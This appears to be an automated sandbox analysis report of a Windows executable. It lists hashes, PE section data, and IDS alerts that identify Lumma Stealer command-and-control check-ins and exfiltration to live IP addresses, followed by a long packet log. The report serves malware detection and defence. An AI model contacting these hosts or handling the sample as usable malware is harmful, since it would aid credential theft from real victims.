Preview:	/..GG..z..>.p(.....!}..h..}..O.;....."}$48...Bk.a-,n."..n.1&.. ..........c....<i`p...'.....E3.&..Q.y......oX.W:.u.....`.....?.l..uFWV..(H.u.......H.....(%8...x,...h.i..w.y...#...\.`V'v.2..F1S+4.c.3..j.Z.r.d.b.6.h....=....yH.:.....a..m...)a...w;.=4...\i....p.'.p.$.?x....T...!G<.W4......Q.qG..B05.t..tP.E....r.S.Gx.........1~...%.6..I........4..T7...$u:...4.WC^.2v..t....E.....%....t].D....4$.U...&.h. Im..Y"{,...\|...?[9[..";6....~.$2P...Fb.....UZ^9&.....!..}."<.y...?....\|..Y........$......>.V.Be....l^.&.h%Z.f..6........3.n.Sg......MU.^&..A..=.b.......e"..5p...i..r.$.R.%.f..8.2`.C."r._..9.6-.b.y.y5n...L.W...?$......r..>.....A...q.....Q...E.c..[.Qho..C..G.....:.K.NT.mQ..$.s..y...F...=..\....Y=.r.U....P..0..._u.....ib...r.....V.(.)..R....1..k.h..[0....1r4.......T\p..<...n..;4\D+......u\|7.s2>..60...n.,... ...X..1=...N.6.pC....@l.....p...<(....../..G.t4....7wp+...r.J%...0.N....g....]..\|..n.......o.Lx..q.S...B.5],.M.H.P...@B...g.js.N.fY..9..{..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.982046518570826
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	es5qBEFupj.exe
File size:	7'114'240 bytes
MD5:	25c8f6ada1179e3fcf486844e5c1ed24
SHA1:	286fa29c9a674651b445e465309c21c99e2d5b95
SHA256:	8077581cfece59ca6d8e06d5bedde9664014531a091d3c15732aeae4679dd40e
SHA512:	2fcd279f794a18b86d3dc26b465b256db93b8050cd1db9f36841819e87d7d652103555ce6ee08b46b7202b1fc5fd35f58dc0096c6cb3af810087eb6f82a3acd3
SSDEEP:	98304:nTm9oJWyCB7XYWQcuX7z5e4Eg++HLCErN68MMTMO3YS68ThO/sjsgV:n6eJ87oWBu/5QP+XrTMMn68Ts/s
TLSH:	C566331879914483E9CD6B37BED87F9B0331BD3C9B6E4C2D3F15098AAF52D962907A01
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.ng..................x..........@... ... y...@.. ................................m...@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xff4000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676E9445 [Fri Dec 27 11:49:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8AF1A8583Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x794055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x792000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7941f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x790000	0x518a00	7de12e1a5c538c13bb323085698b20ec	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x792000	0x53c	0x400	39924b1b0392fbe94604b5af8aa2854e	False	0.685546875	data	5.668315969973589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x794000	0x2000	0x200	a0232179652c49de360269397bdb9eca	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x796000	0x2b0000	0x200	fd71d8d5051eec51c7eb290ec58f90b1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ggsvuvii	0xa46000	0x1ac000	0x1ab600	d1c616a638276a222eb189b1c18b14c3	False	0.9946427592132202	data	7.953466652603566	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bfvlwstb	0xbf2000	0x2000	0x400	d8bed6190934618159d53cab176402e7	False	0.7333984375	data	5.887483094879372	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xbf4000	0x4000	0x2200	9db8958178763e709b11d18da4cadfe8	False	0.06675091911764706	DOS executable (COM)	0.7365750852112953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbf1014	0x244	data			0.4689655172413793
RT_MANIFEST	0xbf1258	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T09:34:53.034167+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49754	172.67.128.184	443	TCP
2024-12-28T09:34:53.947129+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49754	172.67.128.184	443	TCP
2024-12-28T09:34:53.947129+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49754	172.67.128.184	443	TCP
2024-12-28T09:34:55.202333+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49760	172.67.128.184	443	TCP
2024-12-28T09:34:55.974849+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49760	172.67.128.184	443	TCP
2024-12-28T09:34:55.974849+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49760	172.67.128.184	443	TCP
2024-12-28T09:34:57.558546+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49766	172.67.128.184	443	TCP
2024-12-28T09:34:59.828548+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49772	172.67.128.184	443	TCP
2024-12-28T09:35:02.092410+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49778	172.67.128.184	443	TCP
2024-12-28T09:35:04.435142+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49784	172.67.128.184	443	TCP
2024-12-28T09:35:05.322094+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49784	172.67.128.184	443	TCP
2024-12-28T09:35:06.931421+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49790	172.67.128.184	443	TCP
2024-12-28T09:35:10.480730+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49801	172.67.128.184	443	TCP
2024-12-28T09:35:11.270675+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49801	172.67.128.184	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:34:28.102749109 CET	49699	443	192.168.2.7	34.226.108.155
Dec 28, 2024 09:34:28.102799892 CET	443	49699	34.226.108.155	192.168.2.7
Dec 28, 2024 09:34:28.102929115 CET	49699	443	192.168.2.7	34.226.108.155
Dec 28, 2024 09:34:28.105586052 CET	49699	443	192.168.2.7	34.226.108.155
Dec 28, 2024 09:34:28.105598927 CET	443	49699	34.226.108.155	192.168.2.7
Dec 28, 2024 09:34:29.905766964 CET	443	49699	34.226.108.155	192.168.2.7
Dec 28, 2024 09:34:29.906523943 CET	49699	443	192.168.2.7	34.226.108.155
Dec 28, 2024 09:34:29.906557083 CET	443	49699	34.226.108.155	192.168.2.7
Dec 28, 2024 09:34:29.908051014 CET	443	49699	34.226.108.155	192.168.2.7
Dec 28, 2024 09:34:29.908143997 CET	49699	443	192.168.2.7	34.226.108.155
Dec 28, 2024 09:34:29.910109043 CET	49699	443	192.168.2.7	34.226.108.155
Dec 28, 2024 09:34:29.910180092 CET	443	49699	34.226.108.155	192.168.2.7
Dec 28, 2024 09:34:29.924802065 CET	49699	443	192.168.2.7	34.226.108.155
Dec 28, 2024 09:34:29.924830914 CET	443	49699	34.226.108.155	192.168.2.7
Dec 28, 2024 09:34:29.997685909 CET	49699	443	192.168.2.7	34.226.108.155
Dec 28, 2024 09:34:30.254554033 CET	443	49699	34.226.108.155	192.168.2.7
Dec 28, 2024 09:34:30.254759073 CET	443	49699	34.226.108.155	192.168.2.7
Dec 28, 2024 09:34:30.254812956 CET	49699	443	192.168.2.7	34.226.108.155
Dec 28, 2024 09:34:30.255753994 CET	49699	443	192.168.2.7	34.226.108.155
Dec 28, 2024 09:34:30.255775928 CET	443	49699	34.226.108.155	192.168.2.7
Dec 28, 2024 09:34:43.204994917 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.326107979 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.326173067 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.327140093 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.446804047 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.446819067 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.446907997 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.446938992 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.446976900 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.447010994 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.447022915 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.447022915 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.447057009 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.447062016 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.447091103 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.447094917 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.447115898 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.447150946 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.447174072 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.447185993 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.447235107 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.566616058 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.566628933 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.566665888 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.566684008 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.566704035 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.566740036 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.566812992 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.566823006 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.566884041 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.614950895 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.615082026 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.731081963 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.731182098 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:43.782799959 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.894820929 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:43.894886017 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.094896078 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.095005035 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.338867903 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.338936090 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.340810061 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.341037035 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.341103077 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.459063053 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.459147930 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.460732937 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.460781097 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.460797071 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.460839987 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.460850954 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.460881948 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.460911036 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.460937023 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.460948944 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461008072 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461019993 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461065054 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.461138964 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461160898 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461220026 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.461249113 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461314917 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461380005 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.461381912 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461450100 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461503983 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.461779118 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461791992 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.461822033 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.462881088 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.462898016 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.463536024 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.463570118 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.463613987 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.463799953 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.463815928 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.463959932 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.463969946 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.464019060 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.464144945 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.464246035 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.464339972 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.464390993 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.470068932 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.506860971 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.506925106 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.578839064 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.578915119 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.580430031 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.580509901 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.580570936 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.580637932 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.580671072 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.580733061 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.580795050 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.580883980 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.580928087 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581022024 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581037045 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581162930 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581306934 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581389904 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581429958 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581517935 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581746101 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581769943 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581861019 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.581871986 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.582281113 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.589936972 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.589998960 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590001106 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590013027 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590028048 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590049982 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590065002 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590081930 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590090036 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590101004 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590133905 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590186119 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590218067 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590236902 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590270996 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590317011 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590331078 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590363979 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590382099 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590405941 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590423107 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590462923 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590476990 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590502977 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590533018 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.590554953 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590616941 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590682030 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590718985 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590823889 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590836048 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590918064 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.590940952 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591013908 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591084003 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591140032 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591151953 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591166019 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591222048 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591367006 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591375113 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591415882 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591464996 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591553926 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591566086 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591638088 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591737032 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591747046 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591756105 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591799021 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591839075 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591893911 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591902971 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.591938972 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.626553059 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.699394941 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.699412107 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701170921 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701180935 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701248884 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701258898 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701289892 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701332092 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701392889 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701756954 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.701769114 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701828003 CET	49726	80	192.168.2.7	194.87.58.92
Dec 28, 2024 09:34:44.701881886 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701890945 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.701962948 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702049017 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702058077 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702081919 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702119112 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702152967 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702219009 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702229023 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702330112 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702338934 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702385902 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702433109 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702497005 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702506065 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702601910 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702610970 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702682972 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702744961 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702857971 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702867031 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702929020 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702939987 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.702977896 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.709602118 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.709611893 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.709621906 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.709661007 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.709713936 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.709769964 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.709822893 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.709899902 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.709928036 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.709989071 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710064888 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710130930 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710164070 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710201025 CET	80	49726	194.87.58.92	192.168.2.7
Dec 28, 2024 09:34:44.710237026 CET	80	49726	194.87.58.92	192.168.2.7
